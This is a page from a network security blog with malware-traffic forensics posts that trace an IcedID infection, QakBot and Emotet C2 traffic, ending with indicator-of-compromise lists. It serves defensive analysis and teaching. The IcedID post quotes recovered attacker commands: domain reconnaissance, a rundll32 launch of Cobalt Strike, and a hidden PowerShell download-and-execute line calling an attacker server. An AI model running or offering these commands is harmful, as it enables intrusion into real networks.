NETRESEC Network Security Blog

Erik Hjelmvik

,

Thursday, 12 October 2023 13:23:00 (UTC/GMT)

Forensic Timeline of an IcedID Infection

The BackConnect and VNC parsers that were added to NetworkMiner 2.8.1 provide a unique possibility to trace the steps of an attacker with help of captured network traffic from a hacked computer.

In this blog post I use the free and open source version of NetworkMiner to see how GzipLoader downloads IcedID, after which the attacker deploys BackConnect VNC to purchase an iPhone 14 with a stolen credit card and then drops Cobalt Strike on the victim PC.

The analyzed pcap is 2022-10-31-IcedID-with-DarkVNC-and-Cobalt-Strike-full-pcap-raw.pcap from Brad Duncan's malware-traffic-analysis.net blog.

Safety First

I ran NetworkMiner in a Windows Sandbox when analyzing this PCAP file to avoid accidentally infecting my computer with any of the malicious artifacts that NetworkMiner extracts from the network traffic.

Another safe way to analyze Windows malware is to run NetworkMiner in Linux or macOS.

14:47 GzipLoader

This infection starts with GzipLoader (aka “IcedID Downloader”) reaching out to its C2 server on vgiragdoffy[.]com (67.205.184.237:80) to download IcedID.

Cookie parameters from GzipLoader request in NetworkMiner 2.8.1

Image: Cookie parameters from GzipLoader request

The “_gat” cookie value in frame number 6 tells us that the victim machine is running a Windows 10 build 19045 (aka 22H2). The long “_u” value contains the victim’s username and hostname in hexadecimal representation and the “__io” value is the logged in user’s SID. NetworkMiner decodes these values from the GzipLoader request and displays them in the Hosts tab.

Hostname, SID, username and Windows version extracted from GzipLoader cookie by NetworkMiner 2.8.1

Image: Hostname, SID, username and Windows version extracted from GzipLoader cookie

For more info about the GzipLoader cookie, see IcedID PhotoLoader evolution by Jason Reaves and the eSentire blog post on Gootloader and IcedID.

The response for this GzipLoader request is a 550 kB file (MD5 700c602086590b05dde8df57933c7e68) with a fake gzip header. This file actually contains the IcedID DLL (Odwikp.dll) and license.dat files.

Image: Fake gzip file containing IcedID

14:47 IcedID

The banking trojan IcedID (aka BokBot) gets launched at 14:47:29 UTC (frame 641) after which it connects to these four IcedID servers used for payload delivery and C2:

ringashopsu[.]com = 137.184.208.116
sainforgromset[.]com = 138.68.255.102
yeloypod[.]hair = 94.140.114.103
airsaintol[.]beauty = 66.63.168.75

NetworkMiner hosts details for IcedID C2 server showing JA3S hash ec74a5c51106f0419184d0dd08fb05bc

Image: JA3S hash of C2 server

These four IcedID servers all run TLS servers with self signed certificates issued for "localhost" and doing TLS handshakes with JA3S hash ec74a5c51106f0419184d0dd08fb05bc. Both these properties can be used as filters in NetworkMiner's Hosts tab to only display the IcedID C2 servers.

Self-signed X.509 certificate issued to localhost from ringashopsu[.]com with thumbprint d14983ecbe0f97023721d0960f5dc98388809cc9

Image: Self-signed certificate from ringashopsu[.]com

14:59 BackConnect and Keyhole VNC

Shortly after the IcedID C2 traffic has been started the IcedID bot also initiates BackConnect C2 connections to 137.74.104.108 on TCP port 8080 (frame 4505 at 14:59:14 UTC).

IcedID BackConnect communication in NetworkMiner 2.8.1

Image: IcedID BackConnect communication

The BackConnect C2 server tells the bot to sleep for 60 seconds two times before launching a reverse VNC session with command 0x11 (frame 4530 at 15:01.09 UTC).

VNC desktop screenshots extracted by NetworkMiner

Image: BackConnect VNC screenshots

Image: Screenshot of attacker’s view of victim screen (Keyhole VNC)

15:06 Apple Store

Image: Attacker’s keystrokes extracted from BackConnect VNC traffic

The keylog of the attacker above reveals that the attacker is typing “iphone 14 apple store buy”. The VNC graphics that NetworkMiner extracted from the PCAP file additionally reveal that this was a Google search query typed into an Edge browser.

Image: Google search results from reverse VNC session

15:10 Credit Card payment

The attacker proceeds to the Apple Store, puts a black iPhone 14 Plus for $987.99 into the shopping cart, enters a delivery address in West Hartford (US) and then inputs credit card details for the payment.

Image: Credit card details entered in Apple Store by attacker

Luckily, the transaction was denied by Apple Store.

Error message from Apple Store: Your payment authorization failed

Image: Payment authorization failed

15:12 Reverse Shell

After having failed to buy an iPhone through the hacked computer the attacker instead deploys three reverse shell sessions using the BackConnect C2 channel.

Frame 143574 on 15:12:30, Frame 144299 on 15:38:22, Frame 147667 on 15:49:32

These three commands are issued in the first reverse shell session:

        net group "domain admins" /dom

        arp -a

        dir \\172.16.0.12\c$

In the second shell session the attacker first runs these three commands:

        shell net group "domain admins" /dom

        net group "domain admins" /dom

        nltest /domain_trusts /all_trusts

...and then starts a file manager session through the BackConnect C2 channel.

15:40 Deploy Cobalt Strike

The BackConnect file manager is used to upload a Cobalt Strike binary called P2.dll to "C:\ProgramData\" on the victim computer in frame 144535.

NetworkMiner 2.8.1 showing CobaltStrike delivered to victim through BackConnect's File Manager

Image: CobaltStrike delivered to victim through BackConnect's File Manager

The uploaded P2.dll is then executed by running this command in the reverse shell session (frame 144707):

        rundll32 c:\programdata\P2.dll,DllRegisterServer
      

NetworkMiner extracts this uploaded DLL from the BackConnect network traffic.

Files extracted by NetworkMiner from network traffic, including Cobalt Strike P2.dll

Image: Files extracted from network traffic

Details for Cobalt Strike P2.dll with MD5 hash cc69a31a067b62dda5f2076f8ee335e1

Image: Details for Cobalt Strike P2.dll

VirusTotal results 46 of 71 for P2.dll cc69a31a067b62dda5f2076f8ee335e1 As you can see in the screenshot above, the MD5 hash of P2.dll is cc69a31a067b62dda5f2076f8ee335e1. This file is flagged as malicious by most AV vendors (P2.dll on VT). However, none of them label it as Cobalt Strike. Luckily I was able to use Triage's malware config extractor to verify that this was indeed Cobalt Strike (P2.dll on tria.ge). Triage also revealed that the CobaltStrike C2 URL was
clouditsoft[.]com:8008/static-directory/mg.jpg

After the DLL gets executed the victim PC establishes Cobalt Strike beacon C2 connections to clouditsoft[.]com on port 8008 (frame 144715).

Image: Cobalt Strike beacon sessions

15:41 MOAR COBALT STRIKE

The BackConnect Reverse Shell log in NetworkMiner's Parameters tab shows that the attacker also attempted to download Cobalt Strike using PowerShell at 15:41:59 UTC (frame 145176) with this command:

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://clouditsoft[.]com:8008/lass'))"
      

IOC List

IP:port 67.205.184.237:80 (GzipLoader)
DNS vgiragdoffy[.]com (GzipLoader)
MD5 700c602086590b05dde8df57933c7e68 (Fake gzip file)
MD5 f57ab2e5e5720572d5eb19010ec8dcb4 (IcedID Odwikp.dll from fake gzip)
MD5 57a9d9acb389bd74a7423a16ef81ac18 (IcedID license.dat from fake gzip)
DNS ringashopsu[.]com (IcedID C2)
DNS sainforgromset[.]com (IcedID C2)
DNS yeloypod[.]hair (IcedID C2)
DNS airsaintol[.]beauty (IcedID C2)
IP:port 137.184.208.116:443 (IcedID C2)
IP:port 138.68.255.102:443(IcedID C2)
IP:port 94.140.114.103:443 (IcedID C2)
IP:port 66.63.168.7:443 (IcedID C2)
JA3S hash ec74a5c51106f0419184d0dd08fb05bc (IcedID C2)
IP:port 137.74.104.108:8080 (IcedID BackConnect C2)
MD5 cc69a31a067b62dda5f2076f8ee335e1 (CobaltStrike P2.dll)
DNS clouditsoft[.]com (CobaltStrike C2)
IP:port 198.44.140.67:8008 (CobaltStrike C2)

Posted by Erik Hjelmvik on Thursday, 12 October 2023 13:23:00 (UTC/GMT)

Tags: #NetworkMiner #IcedID #GzipLoader #BackConnect #VNC #CobaltStrike #Cobalt Strike #Windows Sandbox #ec74a5c51106f0419184d0dd08fb05bc #JA3S

Share: Short URL: https://netresec.com/?b=23A4de6

Erik Hjelmvik

,

Thursday, 02 March 2023 12:43:00 (UTC/GMT)

QakBot C2 Traffic

In this video I analyze network traffic from a QakBot (QBot) infection in order to identify the Command-and-Control (C2) traffic. The analyzed PCAP file is from malware-traffic-analysis.net.

IOC List

C2 IP and port: 80.47.61.240:2222
C2 IP and port: 185.80.53.210:443
QakBot proxy IP and port: 23.111.114.52:65400
JA3: 72a589da586844d7f0818ce684948eea
JA3S: ec74a5c51106f0419184d0dd08fb05bc
JA3S: fd4bc6cea4877646ccd62f0792ec0b62
meieou.info X.509 cert hash: 9de2a1c39fbe1952221c4b78b8d21dc3afe53a3e
meieou.info X.509 cert Subject OU: Hoahud Duhcuv Dampvafrog
meieou.info X.509 cert Issuer O: Qdf Wah Uotvzke LLC.
gifts.com X.509 cert hash: 0c7a37f55a0b0961c96412562dd0cf0b0b867d37
HTML Body Hash: 22e5446e82b3e46da34b5ebce6de5751664fb867
HTML Title: Welcome to CentOS

Links

QakBot PCAP download (malware-traffic-analysis.net)
80.47.61.240 (VirusTotal)
80.47.61.240:2222 (ThreatFox)
80.47.61.240 (Feodo Tracker)
80.47.61.240 (Censys)
185.80.53.210 (Censys)

For more analysis of QakBot network traffic, check out my Hunting for C2 Traffic video.

Posted by Erik Hjelmvik on Thursday, 02 March 2023 12:43:00 (UTC/GMT)

Tags: #QakBot #QBot #C2 #Video #malware-traffic-analysis.net #ThreatFox #ec74a5c51106f0419184d0dd08fb05bc #fd4bc6cea4877646ccd62f0792ec0b62 #CapLoader #NetworkMiner

Share: Short URL: https://netresec.com/?b=233eaa1

Erik Hjelmvik

,

Wednesday, 15 February 2023 10:52:00 (UTC/GMT)

How to Identify IcedID Network Traffic

Brad Duncan published IcedID (Bokbot) from fake Microsoft Teams page earlier this week. In this video I take a closer look at the PCAP file in that blog post.

Note: This video was recorded in a Windows Sandbox to minimize the risk of infecting the host PC in case of accidental execution of a malicious payload from the network traffic.

As I have previously pointed out, IcedID sends beacons to the C2 server with a 5 minute interval. According to Kai Lu’s blog post A Deep Dive Into IcedID Malware: Part 2, this 5 minute interval is caused by a call to WaitForSingleObject with a millisecond timeout parameter of 0x493e0 (300,000), which is exactly 5 minutes.

UPDATE 2023-03-22

In the research paper Thawing the permafrost of ICEDID Elastic Security Labs confirm that IcedID's default polling interval is 5 minutes. They also mention that this interval is configurable:

Once initialized, ICEDID starts its C2 polling thread for retrieving new commands to execute from one of its C2 domains. The polling loop checks for a new command every N seconds as defined by the g_c2_polling_interval_seconds global variable. By default this interval is 5 minutes, but one of the C2 commands can modify this variable.

The IcedID trojan uses a custom BackConnect protocol in order to interact with victim computers through VNC, a file manager or by establishing a reverse shell. There was no IcedID BackConnect traffic in this particular PCAP file though, but several other IcedID capture files published on malware-traffic-analysis.net do contain IcedID BackConnect traffic. For more information on this proprietary protocol, please see our blog post IcedID BackConnect Protocol.

IOC List

Fake Microsoft Teams download page

URL: hxxp://microsofteamsus[.]top/en-us/teams/download-app/
MD5: 5dae65273bf39f866a97684e8b4b1cd3
SHA256: e365acb47c98a7761ad3012e793b6bcdea83317e9baabf225d51894cc8d9e800
More info: urlscan.io

IcedID GzipLoader

Filename: Setup_Win_13-02-2023_16-33-14.exe
MD5: 7327fb493431fa390203c6003bd0512f
SHA256: 68fcd0ef08f5710071023f45dfcbbd2f03fe02295156b4cbe711e26b38e21c00
More info: Triage

IcedID payload disguised as fake gzip file

URL: hxxp://alishabrindeader[.]com/
MD5: 8e1e70f15a76c15cc9a5a7f37c283d11
SHA256: 7eb6e8fdd19fc6b852713c19a879fe5d17e01dc0fec62fa9dec54a6bed1060e7
More info: IcedID GZIPLOADER Analysis by Binary Defense

IcedID C2 communication

IP and port: 192.3.76.227:443
DNS: treylercompandium[.]com
DNS: qonavlecher[.]com
X.509 certificate SHA1: b523e3d33e7795de49268ce7744d7414aa37d1db
X.509 certificate SHA256: f0416cff86ae1ecc1570cccb212f3eb0ac8068bcf9c0e3054883cbf71e0ab2fb
JA3: a0e9f5d64349fb13191bc781f81f42e1
JA3S: ec74a5c51106f0419184d0dd08fb05bc
Beacon interval: 5 minutes
More info: ThreatFox

Network Forensics Training

Check out our upcoming live network forensics classes for more hands-on network forensic analysis. Our current class material doesn’t include any IcedID traffic though, instead you’ll get to investigate C2 traffic from Cobalt Strike, TrickBot, njRAT, Meterpreter and a few others.

Posted by Erik Hjelmvik on Wednesday, 15 February 2023 10:52:00 (UTC/GMT)

Tags: #IcedID #CapLoader #Video #Periodicity #GzipLoader #a0e9f5d64349fb13191bc781f81f42e1 #ec74a5c51106f0419184d0dd08fb05bc

Share: Short URL: https://netresec.com/?b=23242ad

Erik Hjelmvik

,

Monday, 09 May 2022 06:50:00 (UTC/GMT)

Emotet C2 and Spam Traffic Video

This video covers a life cycle of an Emotet infection, including initial infection, command-and-control traffic, and spambot activity sending emails with malicious spreadsheet attachments to infect new victims.

The video was recorded in a Windows Sandbox in order to avoid accidentally infecting my Windows PC with malware.

Initial Infection

Palo Alto's Unit 42 sent out a tweet with screenshots and IOCs from an Emotet infection in early March. A follow-up tweet by Brad Duncan linked to a PCAP file containing network traffic from the infection on Malware-Traffic-Analysis.net.

Image: Screenshot of original infection email from Unit 42

Attachment MD5: 825e8ea8a9936eb9459344b941df741a

Emotet Download

The PCAP from Malware-Traffic-Analysis.net shows that the Excel spreadsheet attachment caused the download of a DLL file classified as Emotet.

CapLoader download of Emotet DLL from diacrestgroup.com

Image: CapLoader transcript of Emotet download

DNS: diacrestgroup.com
MD5: 99f59e6f3fa993ba594a3d7077cc884d

Emotet Command-and-Control

Just seconds after the Emotet DLL download completes the victim machine starts communicating with an IP address classified as a botnet command-and-control server.

Emotet C2 sessions with JA3 51c64c77e60f3980eea90869b68c58a8 in CapLoader

Image: Emotet C2 sessions in CapLoader

C2 IP: 209.15.236.39
C2 IP: 147.139.134.226
C2 IP: 134.209.156.68
JA3: 51c64c77e60f3980eea90869b68c58a8
JA3S: ec74a5c51106f0419184d0dd08fb05bc
JA3S: fd4bc6cea4877646ccd62f0792ec0b62

Emotet Spambot

The victim PC eventually started sending out spam emails. The spam bot used TLS encryption when possible, either through SMTPS (implicit TLS) or with help of STARTTLS (explicit TLS).

Image: Emotet spambot JA3 hash in NetworkMiner Professional

SMTPS JA3: 37cdab6ff1bd1c195bacb776c5213bf2
STARTTLS JA3: 37cdab6ff1bd1c195bacb776c5213bf2

Transmitted Spam

Below is a spam email sent from the victim PC without TLS encryption. The attached zip file contains a malicious Excel spreadsheet, which is designed to infect new victims with Emotet.